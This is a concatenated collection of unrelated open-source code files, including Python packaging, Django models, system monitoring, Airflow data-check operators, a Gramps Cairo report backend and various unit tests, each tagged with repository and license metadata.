the Free Software Foundatio | n, either version 3 of the License, or
(at your option) any later version.
Worksets is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Worksets. If not, see <http://www.gnu.org/licenses/>.
'''
from os import path
from setuptool | s import setup
from setuptools import find_packages
package_dir = path.abspath(path.dirname(__file__))
with open(path.join(package_dir, 'README.rst'), encoding='utf-8') as file:
long_description = file.read()
setup(
name='worksets',
version='0.1.1',
description='Worksets helps you to quickly launch and arrange multiple applications in your desktop environment to support a specific workflow.',
author='Anders Lykke Gade',
author_email='worksets@gmail.com',
url='https://www.github.com',
download_url='https://www.github.com',
license='GPLv3',
packages=find_packages(
exclude=('__pycache__', 'tests')),
include_package_data=True,
package_data={'': ['LICENSE',
'CHANGES.txt',
'README.md',
'README.rst',
'*.svg',
'*.mo']},
install_requires=[
'tinydb>=3.2.1'],
zip_safe=False,
entry_points={
'gui_scripts': ['worksets = worksets.__main__:run']}
)
|
openturns/otsvm | python/test/t_NormalRBF_std.py | Python | lgpl-3.0 | 701 | 0 | #! /usr/bin/env python
from __future__ import print_function, division
from openturns import *
from otsvm import *
# instantiate a kernel=Gaussian with sigma = 2
kernel = NormalRBF(2)
x = Point(2, 2.0)
y = Point(2, 1.0)
print(" kernel ([2 2],[1 1]) = %.12g" % kernel(x, y))
print(" dkernel/dx_i([2 2],[1 1]) = ", repr(kernel.partialGradient(x, y)))
print(" d2kernel/(dx_i*dx_j)([2 2],[1 1]) = ", repr(
kernel.partialHessian(x, y)))
x[0] = 0.0
x[1] = 5.0
y[0] = 0.0
y[1] = 3.0
print(" kernel ([0 5],[0 3]) = %.12g" % kernel(x, y))
print(" dkernel/dx_i([0 5],[0 3]) = ", repr(k | ernel.partialGradient(x, y)))
print(" d2kernel/(dx_i*dx_j)([0 5],[0 3]) = ", repr(
kernel.partialHessian(x, y))) | |
juslop/angular-chat | django_chat/chat/models.py | Python | mit | 2,659 | 0.007522 | from django.db import models
from django.contrib.auth.models import User
from django.contrib import admin
import os
from PIL import Image
#http://javiergodinez.blogspot.fi/2008/03/square-thumbnail-with-python-image.html
def _thumbnail(img, size):
width, height = img.size
if width > height:
delta = width - height
left = int(delta/2)
upper = 0
right = height + left
lower = height
else:
delta = height - width
left = 0
upper = int(delta/2)
right = width
lower = width + upper
img = img.crop((left, upper, right, lower))
img.thumbnail(size, Image.ANTIALIAS)
retur | n img
class Room(models.Model):
name = models.CharField(max_length=32)
createdBy = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.name
class Message(models.Model):
content = models.TextField(max_len | gth=1000)
responseTo = models.ForeignKey('Message', blank=True, null=True, related_name='responses')
room = models.ForeignKey(Room)
writer = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.content[:30]
class UserExtra(models.Model):
user = models.OneToOneField(User)
img = models.ImageField(upload_to='images', verbose_name="Select Your Profile Image", blank=True, null=True)
thumbnail = models.ImageField(upload_to='images', blank=True, null=True)
def save(self):
try:
this = UserExtra.objects.get(user = self.user)
self.id = this.id #force update instead of insert
if self.img and this.img != self.img:
os.remove(this.img.path)
if this.thumbnail:
os.remove(this.thumbnail.path)
except:
pass
if self.img:
super(UserExtra, self).save()
tsize = 35,35
isize = 700,700
fname, ext = os.path.splitext(self.img.name)
outfilepath = os.path.splitext(self.img.path)[0] + ".thumbnail" + ext
outfilefield = fname + ".thumbnail" + ext
im = Image.open(self.img.path)
im = _thumbnail(im, tsize)
im.save(self.img.path, im.format)
im.thumbnail(isize, Image.ANTIALIAS)
im.save(outfilepath, im.format)
self.thumbnail = outfilefield
super(UserExtra, self).save()
def __unicode__(self):
return self.user.username
admin.site.register(Room)
admin.site.register(Message)
admin.site.register(UserExtra)
|
moustakas/impy | projects/desi-archetypes/elg-archetypes.py | Python | gpl-2.0 | 1,011 | 0.004946 | """
Generate archetypes from the DESI ELG basis spectra.
"""
from __future__ import division, print_function
import os
import sys
import numpy as np
import argparse
import pdb
from astropy.io import fits
from astropy.table import Table
from SetCoverPy.mathutils import quick_amplitude
from desispec.log import get_logger, DEBUG
from desispec.io.util import write_bintable, makepath
from desisim.io import read_basis_templates
def main(args):
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='ELG archetypes')
parser.add_argument('-o', '--objtype', type=str, default='ELG', help='ELG', metavar='')
# Set up the logger.
if args.verbose:
log = get_logger(DEBUG)
else:
log = get_logger()
objtyp | e = args.objtype.upper()
log.debug('Using OBJTYPE {}'.format(objtype))
baseflux, ba | sewave, basemeta = read_basis_templates(objtype=objtype)
pdb.set_trace()
|
siosio/intellij-community | python/testData/completion/fStringLikeCompletionNotAvailableInUnicodeLiterals.py | Python | apache-2.0 | 35 | 0.028571 | my_e | xpr = 42
s = u'foo{my_e<care | t>' |
davidsoncolin/IMS | IO/Command.py | Python | mit | 328 | 0.030488 | #!/usr/bin/env python
import ViconConnect
import IO
import zmq
import time
import sys
if __name__ == | '__main__' :
print sys.argv[1]
client = zmq.Context().socket(zmq.REQ)
client.connect('tcp://localhost:18666')
client.send(sys.argv[1])
print IO.unwrap(client.recv())
#for example:
#python Command.py current_frame | =-1
|
magic2du/dlnn | cmds2/run_CNN_SAT.py | Python | apache-2.0 | 5,839 | 0.010447 | # Copyright 2015 Tianchuan Du University of Delaware
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
import gzip
import numpy
import os
import sys
import theano
from theano.tensor.shared_randomstreams import RandomStreams
import time
from io_func.model_io import _nnet2file, _file2nnet, _cfg2file, log
from learning.sgd import train_sgd_verbose, validate_by_minibatch_verbose
from models.cnn_sat import CNN_SAT
import theano.tensor as T
from utils.network_config import NetworkConfig
from utils.utils import parse_arguments
# Implements the Speaker Adaptive Training of DNNs proposed in the following papers:
# [1] Yajie Miao, Hao Zhang, Florian Metze. "Towards Speaker Adaptive Training of Deep
# Neural Network Acoustic Models". Interspeech 2014.
# [2] Yajie Miao, Lu Jiang, Hao Zhang, Florian Metze. "Improvements to Speaker Adaptive
# Training of Deep Neural Networks". SLT 2014.
if __name__ == '__main__':
# check the arguments
arg_elements = [sys.argv[i] for i in range(1, len(sys.argv))]
arguments = parse_arguments(arg_elements)
required_arguments = ['train_data', 'valid_data', 'si_nnet_spec', 'si_conv_nnet_spec', 'wdir', 'adapt_nnet_spec', 'init_model']
for arg in required_arguments:
if arguments.has_key(arg) == False:
print "Error: the argument %s has to be specified" % (arg); exit(1)
# mandatory arguments
| train | _data_spec = arguments['train_data']; valid_data_spec = arguments['valid_data']
si_nnet_spec = arguments['si_nnet_spec']
si_conv_nnet_spec = arguments['si_conv_nnet_spec']
adapt_nnet_spec = arguments['adapt_nnet_spec'];
wdir = arguments['wdir']
init_model_file = arguments['init_model']
# parse network configuration from arguments, and initialize data reading
cfg_si = NetworkConfig(); cfg_si.model_type = 'CNN'
cfg_si.parse_config_cnn(arguments, '10:' + si_nnet_spec, si_conv_nnet_spec)
cfg_si.init_data_reading(train_data_spec, valid_data_spec)
# parse the structure of the i-vector network
cfg_adapt = NetworkConfig()
net_split = adapt_nnet_spec.split(':')
adapt_nnet_spec = ''
for n in xrange(len(net_split) - 1):
adapt_nnet_spec += net_split[n] + ':'
cfg_adapt.parse_config_dnn(arguments, adapt_nnet_spec + '0')
numpy_rng = numpy.random.RandomState(89677)
theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
log('> ... initializing the model')
# setup up the model
dnn = CNN_SAT(numpy_rng=numpy_rng, theano_rng = theano_rng, cfg_si = cfg_si, cfg_adapt = cfg_adapt)
# read the initial DNN (the SI DNN which has been well trained)
# _file2nnet(dnn.cnn_si.layers, filename = init_model_file)
_file2nnet(dnn.cnn_si.layers, filename = 'BKUP/nnet.param.si')
_file2nnet(dnn.dnn_adapt.layers, filename = 'BKUP/nnet.param.adapt')
# get the training and validation functions for adaptation network training
dnn.params = dnn.dnn_adapt.params # only update the parameters of the i-vector nnet
dnn.delta_params = dnn.dnn_adapt.delta_params
log('> ... getting the finetuning functions for iVecNN')
train_fn, valid_fn = dnn.build_finetune_functions(
(cfg_si.train_x, cfg_si.train_y), (cfg_si.valid_x, cfg_si.valid_y),
batch_size = cfg_adapt.batch_size)
log('> ... learning the adaptation network')
cfg = cfg_adapt
while (cfg.lrate.get_rate() != 0):
# one epoch of sgd training
# train_error = train_sgd_verbose(train_fn, cfg_si.train_sets, cfg_si.train_xy,
# cfg.batch_size, cfg.lrate.get_rate(), cfg.momentum)
# log('> epoch %d, training error %f ' % (cfg.lrate.epoch, 100*numpy.mean(train_error)) + '(%)')
# validation
valid_error = validate_by_minibatch_verbose(valid_fn, cfg_si.valid_sets, cfg_si.valid_xy, cfg.batch_size)
log('> epoch %d, lrate %f, validation error %f ' % (cfg.lrate.epoch, cfg.lrate.get_rate(), 100*numpy.mean(valid_error)) + '(%)')
cfg.lrate.get_next_rate(current_error = 100 * numpy.mean(valid_error))
cfg.lrate.rate = 0
# save the model and network configuration
if cfg.param_output_file != '':
_nnet2file(dnn.dnn_adapt.layers, filename = cfg.param_output_file + '.adapt',
input_factor = cfg_adapt.input_dropout_factor, factor = cfg_adapt.dropout_factor)
_nnet2file(dnn.cnn_si.layers, filename = cfg.param_output_file + '.si',
input_factor = cfg_si.input_dropout_factor, factor = cfg_si.dropout_factor)
log('> ... the final PDNN model parameter is ' + cfg.param_output_file + ' (.si, .adapt)')
if cfg.cfg_output_file != '':
_cfg2file(cfg_adapt, filename=cfg.cfg_output_file + '.adapt')
_cfg2file(cfg_si, filename=cfg.cfg_output_file + '.si')
log('> ... the final PDNN model config is ' + cfg.cfg_output_file + ' (.si, .adapt)')
# output the model into Kaldi-compatible format
if cfg.kaldi_output_file != '':
dnn.cnn_si.fc_dnn.write_model_to_kaldi(cfg.kaldi_output_file + '.si')
dnn.dnn_adapt.write_model_to_kaldi(cfg.kaldi_output_file + '.adapt', with_softmax = False)
log('> ... the final Kaldi model is ' + cfg.kaldi_output_file + ' (.si, .adapt)')
|
rizar/attention-lvcsr | libs/blocks/tests/extensions/test_progressbar.py | Python | mit | 1,721 | 0 | import numpy
import theano
from fuel.datasets import IterableDataset
from theano import tensor
from blocks.algorithms import GradientDescent, Scale
from blocks.extensions import FinishAfter, ProgressBar, Printing
from blocks.main_loop import MainLoop
from blocks.utils import shared_floatx
def setup_mainloop(extension):
"""Set up a simple main loop for progress bar tests.
Create a MainLoop, register the given extension, supply it with a
DataStream and a minimal model/cost to optimize.
"""
# Since progressbar2 3.6.0, the `maxval` kwarg has been replaced by
# `max_value`, which has a default value of 100. If we're still using
# `maxval` by accident, this test should fail complaining that
# the progress bar has received a value out of range.
features = [numpy.array(f, dtype=theano.config.floatX)
for f in [[1, 2]] * 101]
dataset = IterableDataset(dict(features=features))
W = shared_floatx([0, 0], name='W')
x = tensor.vector('features')
cost = tensor.sum((x-W)**2)
cost.name = "cost"
algorithm = GradientDescent(cost=cost, parameters=[W],
step_rule=Scale(1e-3))
main_loop = MainLoop(
model=None, data_stream=dataset.get_example_stream(),
algorithm=algorithm,
extensions=[
FinishAfter(after_n_epochs=1),
extension])
| return main_loop
def test_progressb | ar():
main_loop = setup_mainloop(ProgressBar())
# We are happy if it does not crash or raise any exceptions
main_loop.run()
def test_printing():
main_loop = setup_mainloop(Printing())
# We are happy if it does not crash or raise any exceptions
main_loop.run()
|
secisland/HostMonitor | system.py | Python | gpl-2.0 | 4,072 | 0.041307 | #!/usr/bin/env python
#coding:utf-8
import commands
import os
import base
class SystemStat(object):
'系统基本性能数据收集'
def __init__(self,interval = 30 , cpu_core = True ):
self.interval = interval
self.cpu_core = cpu_core
def _read_cpu_usage(self):
'''
从/proc/stat 读取CPU状态
返回值为列表: [ ['cpu', 'total_value','use_value'] , ['cpu0', 'total_value','use_value'], ...]
'''
ret = []
lines = open("/proc/stat").readlines()
for line in lines:
l = line.split()
if len(l) < 5:
continue
if l[0].strip().startswith('cpu'):
total = long(l[1]) + long(l[2]) + long(l[3]) + long(l[4]) + long(l[5]) + long(l[6]) + long(l[7])
use = long(l[1]) + long(l[2]) + long(l[3])
ret.append([l[0].strip(),total,use])
return ret
def get_cpu_usage(self):
'''
计算CPU使用率
返回值为字典:{'cpu':值 , 'cpu0':值 , ...} 默认返回值CPU总体使用率不包含各个核心使用率
'''
ret = {}
stat1 = self._read_cpu_usage()
base.time.sleep(self.interval)
stat2 = self._read_cpu_usage()
if not self.cpu_core:
num = 1
else:
num = len(stat2)
for i in range(num):
cpuper = 100*((stat2[i][2] - stat1[i][2])/float(stat2[i][1] - stat1[i][1]))
ret[stat2[i][0]]= int(cpuper)
#print cpuper
#for i in ret.keys():
#print '%s 使用率: %s'%(i,ret[i])
return ret
def get_mem_usage(self):
'''获取内存使用率,返回整数的百分数'''
mem = {}
meminfo = open("/proc/meminfo").readlines()
for i in meminfo:
if len(i) < 2:
continue
name = i.split(':')[0]
value = i.split()[1]
mem[name] = long(value) / 1024.0
memper = (mem['MemTotal'] - mem['MemFree'] - mem['Buffers'] - mem['Cached'])/float(mem['MemTotal'])
return int(100*memper)
def _read_net_rate(self):
'''计算网卡接收和发送的字节数
返回值字典 {'网卡0':['接收字节','发送字节'],'网卡1':['接收字节','发送字节]}
'''
ret = {}
netinfo = open('/proc/net/dev').readlines()
for line in netinfo:
line_split = line.split(':')
if len(line_split) < 2:
continue
ret[line_split[0].strip()] = [line_split[1].split()[0]]
ret[line_split[0].strip()].append(line_split[1].split()[8])
#print 'netre:%s nettr:%s'%(netre,nettr)
return ret
def get_net_rate(self, interval = 2):
'''获取网卡速率,返回值为字典{'网卡0':'速率','网卡1':'速率'} '''
ret = {}
total1 = {}
total2 = {}
netinfo = self._read_net_rate()
for i in netinfo.keys():
total1[i] = long(netinfo[i][0]) + long(netinfo[i][1])
base.time.sleep(interval)
netinfo = se | lf._read_net_rate()
for i in netinfo.keys():
total2[i] = long(netinfo[i][0]) + long(netinfo[i][1])
for i in total2.keys():
ret[i] = ((total2[i] -total1[i])/1024.0/interval)*8
return ret
def get_load(self):
''' 获取系统5分钟内的平均负载 '''
return os.getloadavg()[0]
def ge | t_disk_usage(self):
'''获取磁盘使用率,返回字典{挂载点:百分数}'''
ret = {}
mountinfo = open('/proc/mounts').readlines()
for i in mountinfo:
mountpoint = i.split()[1].strip()
if i.split()[2].strip().startswith('ext'):
mp_info = os.statvfs(mountpoint)
mp_usage = 100*((mp_info.f_blocks - mp_info.f_bavail)/float(mp_info.f_blocks))
ret[mountpoint] = int(mp_usage)
return ret
def get_inode_usage(self):
'''获取文件系统inode使用率,返回字典{挂载点:百分数}'''
ret = {}
mountinfo = open('/proc/mounts').readlines()
for i in mountinfo:
mountpoint = i.split()[1].strip()
if i.split()[2].strip().startswith('ext'):
inode_info = os.statvfs(mountpoint)
inode_usage = 100*((inode_info.f_files - inode_info.f_favail)/float(inode_info.f_files))
ret[mountpoint] = int(inode_usage)
return ret
if __name__ == '__main__':
test = SystemStat()
print "CPU:%s"%test.get_cpu_usage()
print "Mem:%s"%test.get_mem_usage()
print "Disk:%s"%test.get_disk_usage()
print "Inode:%s"%test.get_inode_usage()
print "Net:%s"%test.get_net_rate()
print "Load:%s"%test.get_load() |
vsquare95/JiyuuBot | modules/pull.py | Python | gpl-3.0 | 353 | 0.005666 | def pull(self, command):
import subprocess
output = subprocess.Po | pen(["git", "pull"], | stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in output.stdout:
self.conman.gen_send("***Git output: %s" % line)
for line in output.stderr:
self.conman.gen_send("***Git error: %s" % line)
self._map("command", "pull", pull)
|
gilt/incubator-airflow | airflow/operators/check_operator.py | Python | apache-2.0 | 9,424 | 0.000318 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import zip
from builtins import str
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class CheckOperator(BaseOperator):
"""
Performs checks against a db. The ``CheckOperator`` expects
a sql query that will return a single row. Each value on that
first row is evaluated using python ``bool`` casting. If any of the
values return ``False`` the check is failed and errors out.
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, or that the count of today's partition is
greater than yesterday's partition, or that a set of metrics are less
than 3 standard deviation for the 7 day average.
This operator can be used as a data quality check in your pipeline, and
depending on where you put it in your DAG, you have the choice to
stop the critical path, preventing from
publishing dubious data, or on the side and receive email alerts
without stopping the progress of the DAG.
Note that this is an abstract class and get_db_hook
needs to be defined. Whereas a get_db_hook is hook that gets a
single record from an external source.
:param sql: the sql to be executed
:type sql: string
"""
template_fields = ('sql',)
template_ext = ('.hql', '.sql',)
ui_color = '#fff7e6'
@apply_defaults
def __init__(
self, sql,
conn_id=None,
*args, **kwargs):
super(CheckOperator, self).__init__(*args, **kwargs)
self.conn_id = conn_id
self.sql = sql
def execute(self, context=None):
self.log.info('Executing SQL check: %s', self.sql)
records = self.get_db_hook().get_first(self.sql)
self.log.info('Record: %s', records)
if not records:
raise AirflowException("The query returned None")
elif not all([bool(r) for r in records]):
exceptstr = "Test failed.\nQuery:\n{q}\nResults:\n{r!s}"
raise AirflowException(exceptstr.format(q=self.sql, r=records))
self.log.info("Success.")
def get_db_hook(self):
return BaseHook.get_hook(conn_id=self.conn_id)
def _convert_to_float_if_possible(s):
'''
A small helper function to convert a string to a numeric value
if appropriate
:param s: the string to be converted
:type s: str
'''
try:
ret = float(s)
except (ValueError, TypeError):
ret = s
return ret
class ValueCheckOperator(BaseOperator):
"""
Performs a simple value check using sql code.
Note that this is an abstract class and get_db_hook
needs to be defined. Whereas a get_db_hook is hook that gets a
single record from an external source.
:param sql: the sql to be executed
:type sql: string
"""
__mapper_args__ = {
'polymorphic_identity': 'ValueCheckOperator'
}
template_fields = ('sql',)
template_ext = ('.hql', '.sql',)
ui_color = '#fff7e6'
@apply_defaults
def __init__(
self, sql, pass_value, tolerance=None,
conn_id=None,
*args, **kwargs):
super(ValueCheckOperator, self).__init__(*args, **kwargs)
self.sql = sql
self.conn_id = conn_id
self.pass_value = _convert_to_float_if_possible(pass_value)
tol = _convert_to_float_if_possible(tolerance)
self.tol = tol if isinstance(tol, float) else None
self.is_numeric_value_check = isinstance(self.pass_value, float)
self.has_tolerance = self.tol is not None
def execute(self, context=None):
self.log.info('Executing SQL check: %s', self.sql)
records = self.get_db_hook().get_first(self.sql)
if not records:
raise AirflowException("The query returned None")
test_results = []
except_temp = ("Test failed.\nPass value:{self.pass_value}\n"
"Query:\n{self.sql}\nResults:\n{records!s}")
if not self.is_numeric_value_check:
tests = [str(r) == self.pass_value for r in records]
elif self.is_numeric_value_check:
try:
num_rec = [float(r) for r in records]
except (ValueError, TypeError) as e:
cvestr = "Converting a result to float failed.\n"
raise AirflowException(cvestr+except_temp.format(**locals()))
if self.has_tolerance:
tests = [
r / (1 + self.tol) <= self.pass_value <= r / (1 - self.tol)
for r in num_rec]
else:
tests = [r == self.pass_value for r in num_rec]
if not all(tests):
raise AirflowException(except_temp.format(**locals()))
def get_db_hook(self):
return BaseHook.get_hook(conn_id=self.conn_id)
class IntervalCheckOperator(BaseOperator):
"""
Checks that the values of metrics given as SQL expressions are within
a certain tolerance of the ones from days_back before.
Note that this is an abstract class and get_db_hook
needs to be defined. Whereas a get_db_hook is hook that gets a
single record from an external source.
:param table: the table name
:type table: str
:param days_back: number of days between ds and the ds we want to check
against. Defaults to 7 days
:type days_back: int
:param metrics_threshold: a dictionary of ratios indexed by metrics
:type metrics_threshold: dict
"""
__mapper_args__ = {
'polymorphic_identity': 'IntervalCheckOperator'
}
template_fields = ('sql1', 'sql2')
template_ext = ('.hql', '.sql',)
ui_color = '#fff7e6'
@apply_defaults
def __init__(
self, table, metrics_thresholds,
date_filter_column='ds', days_back=-7,
conn_id=None,
*args, **kwargs):
super(IntervalCheckOperator, self).__init__(*args, **kwargs)
self.table = table
self.metrics_thresholds = metrics_thresholds
self.metrics_sorted = sorted(metrics_thresholds.keys())
self.date_filter_column = date_filter_column
self.days_back = -abs(days_back)
self.conn_id = conn_id
sqlexp = ', '.join(self.metrics_sorted)
sqlt = | ("SELECT {sqlexp} FROM {table}"
" WHERE {date_filter_column}=").format(**locals())
self.sql1 = sqlt + "'{{ ds }}'"
self.sql2 = sqlt + "'{{ macros.ds_add(ds, "+str(se | lf.days_back)+") }}'"
def execute(self, context=None):
hook = self.get_db_hook()
self.log.info('Executing SQL check: %s', self.sql2)
row2 = hook.get_first(self.sql2)
self.log.info('Executing SQL check: %s', self.sql1)
row1 = hook.get_first(self.sql1)
if not row2:
raise AirflowException("The query {q} returned None".format(q=self.sql2))
if not row1:
raise AirflowException("The query {q} returned None".format(q=self.sql1))
current = dict(zip(self.metrics_sorted, row1))
reference = dict(zip(self.metrics_sorted, row2))
ratios = {}
test_results = {}
rlog = "Ratio for {0}: {1} \n Ratio |
jralls/gramps | gramps/plugins/lib/libcairodoc.py | Python | gpl-2.0 | 62,883 | 0.003403 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2007 Zsolt Foldvari
# Copyright (C) 2009 Benny Malengier
# Copyright (C) 2009 Brian Matherly
# Copyright (C) 2010 Peter Landgren
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2011-2017 Paul Franklin
# Copyright (C) 2012 Craig Anderson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of | the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""Report output generator based on Cairo.
"""
#------------------------------------------------------------------------
#
# Python modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS | _LOCALE as glocale
_ = glocale.translation.gettext
from math import radians
import re
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.plug.docgen import (BaseDoc, TextDoc, DrawDoc, ParagraphStyle,
TableCellStyle, SOLID, FONT_SANS_SERIF, FONT_SERIF,
FONT_MONOSPACE, PARA_ALIGN_CENTER, PARA_ALIGN_LEFT)
from gramps.gen.plug.report import utils
from gramps.gen.errors import PluginError
from gramps.gen.plug.docbackend import CairoBackend
from gramps.gen.utils.image import resize_to_buffer
from gramps.gui.utils import SystemFonts
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".libcairodoc")
#-------------------------------------------------------------------------
#
# Pango modules
#
#-------------------------------------------------------------------------
from gi.repository import Pango, PangoCairo
#------------------------------------------------------------------------
#
# Constants
#
#------------------------------------------------------------------------
# each element draws some extra information useful for debugging
DEBUG = False
#------------------------------------------------------------------------
#
# Font selection
#
#------------------------------------------------------------------------
_TTF_FREEFONT = {
FONT_SERIF: 'FreeSerif',
FONT_SANS_SERIF: 'FreeSans',
FONT_MONOSPACE: 'FreeMono',
}
_MS_TTFONT = {
FONT_SERIF: 'Times New Roman',
FONT_SANS_SERIF: 'Arial',
FONT_MONOSPACE: 'Courier New',
}
_GNOME_FONT = {
FONT_SERIF: 'Serif',
FONT_SANS_SERIF: 'Sans',
FONT_MONOSPACE: 'Monospace',
}
font_families = _GNOME_FONT
# FIXME debug logging does not work here.
def set_font_families():
"""Set the used font families depending on availability.
"""
global font_families
fonts = SystemFonts()
family_names = fonts.get_system_fonts()
fam = [f for f in _TTF_FREEFONT.values() if f in family_names]
if len(fam) == len(_TTF_FREEFONT):
font_families = _TTF_FREEFONT
log.debug('Using FreeFonts: %s' % font_families)
return
fam = [f for f in _MS_TTFONT.values() if f in family_names]
if len(fam) == len(_MS_TTFONT):
font_families = _MS_TTFONT
log.debug('Using MS TrueType fonts: %s' % font_families)
return
fam = [f for f in _GNOME_FONT.values() if f in family_names]
if len(fam) == len(_GNOME_FONT):
font_families = _GNOME_FONT
log.debug('Using Gnome fonts: %s' % font_families)
return
log.debug('No fonts found.')
set_font_families()
#------------------------------------------------------------------------
#
# Converter functions
#
#------------------------------------------------------------------------
def fontstyle_to_fontdescription(font_style):
"""Convert a FontStyle instance to a Pango.FontDescription one.
Font color and underline are not implemented in Pango.FontDescription,
and have to be set with Pango.Layout.set_attributes(attrlist) method.
"""
if font_style.get_bold():
f_weight = Pango.Weight.BOLD
else:
f_weight = Pango.Weight.NORMAL
if font_style.get_italic():
f_style = Pango.Style.ITALIC
else:
f_style = Pango.Style.NORMAL
font_description = Pango.FontDescription(font_families[font_style.face])
font_description.set_size(int(round(font_style.get_size() * Pango.SCALE)))
font_description.set_weight(f_weight)
font_description.set_style(f_style)
return font_description
def tabstops_to_tabarray(tab_stops, dpi):
"""Convert a list of tabs given in cm to a Pango.TabArray.
"""
tab_array = Pango.TabArray.new(initial_size=len(tab_stops),
positions_in_pixels=False)
for index in range(len(tab_stops)):
location = tab_stops[index] * dpi * Pango.SCALE / 2.54
tab_array.set_tab(index, Pango.TabAlign.LEFT, int(location))
return tab_array
def raw_length(s):
"""
Return the length of the raw string after all pango markup has been removed.
"""
s = re.sub('<.*?>', '', s)
s = s.replace('&', '&')
s = s.replace('<', '<')
s = s.replace('>', '>')
s = s.replace('"', '"')
s = s.replace(''', "'")
return len(s)
###------------------------------------------------------------------------
###
### Table row style
###
###------------------------------------------------------------------------
##class RowStyle(list):
##"""Specifies the format of a table row.
##RowStyle extents the available styles in
##The RowStyle contains the width of each column as a percentage of the
##width of the full row. Note! The width of the row is not known until
##divide() or draw() method is called.
##"""
##def __init__(self):
##self.columns = []
##def set_columns(self, columns):
##"""Set the number of columns.
##@param columns: number of columns that should be used.
##@param type: int
##"""
##self.columns = columns
##def get_columns(self):
##"""Return the number of columns.
##"""
##return self.columns
##def set_column_widths(self, clist):
##"""Set the width of all the columns at once.
##@param clist: list of width of columns in % of the full row.
##@param tyle: list
##"""
##self.columns = len(clist)
##for i in range(self.columns):
##self.colwid[i] = clist[i]
##def set_column_width(self, index, width):
##"""
##Set the width of a specified column to the specified width.
##@param index: column being set (index starts at 0)
##@param width: percentage of the table width assigned to the column
##"""
##self.colwid[index] = width
##def get_column_width(self, index):
##"""
##Return the column width of the specified column as a percentage of
##the entire table width.
##@param index: column to return (index starts at 0)
##"""
##return self.colwid[index]
class FrameStyle:
"""Define the style properties of a Frame.
- width: Width of the frame in cm.
- height: Height of the frame in cm.
- align: Horizontal position to entire page.
Available values: 'left','center', 'right'.
- spacing: Tuple of spacing around the frame in cm. Order of values:
(left, right, top, bottom).
"""
def __init__(self, width= |
bluedynamics/vdexcsv | src/vdexcsv/tests.py | Python | bsd-3-clause | 886 | 0.003386 | import unittest
import doctest
from pprint import pprint
from interlude import interact
import lxml.etree as etree
optionflags = doctest.NORMALIZE_WH | ITESPACE | \
doctest.ELLIPSIS | \
doctest.REPORT_ONLY_FIRST_FAILURE #| \
# doctest.REPORT_NDIFF
TESTFILES = [
'api.rst',
'script.rst',
]
def fxml(xml):
et = etree.fromstring(xml)
return etree.tostring(et, pretty_print=True)
def pxml(xml):
print fxml(xml)
def test_suite():
return unittest.TestSuite([
doctest.DocFileSuite(
| filename,
optionflags=optionflags,
globs={'interact': interact,
'pprint': pprint,
'pxml': pxml},
) for filename in TESTFILES
])
if __name__ == '__main__': # pragma NO COVERAGE
unittest.main(defaultTest='test_suite') # pragma NO COVERAGE
|
kuc2477/django-record | django_record/tests/test_mixins.py | Python | gpl-2.0 | 2,680 | 0 | from django.test import TestCase
from random import randint, uniform
from faker import Faker
from .models import TITLE_MAX_LENGTH, POINT_MAX_LENGTH, TEXT_MAX_LENGTH
from .models import Article, Comment, Vote
f = Faker()
class MixinTest(TestCase):
def setUp(self):
article = Article.objects.create(
title=f.text()[:TITLE_MAX_LENGTH]
)
comment = Comment.objects.create(
article=article,
point=f.text()[:POINT_MAX_LENGTH],
text=f.text()[:TEXT_MAX_LENGTH],
impact=randint(0, 10),
impact_rate=uniform(0, 1)
| )
Vote.objects.create(
comment=comment,
score=randint(0, 10)
)
def tearDown(self):
Article.objects.all().delete()
def test_record_on_creation(self):
vote = Vote.objects.first()
self.assertTrue(vote.records.exists())
def test_changed_save_recording(self):
vote = | Vote.objects.first()
number_of_records_before_save = vote.records.count()
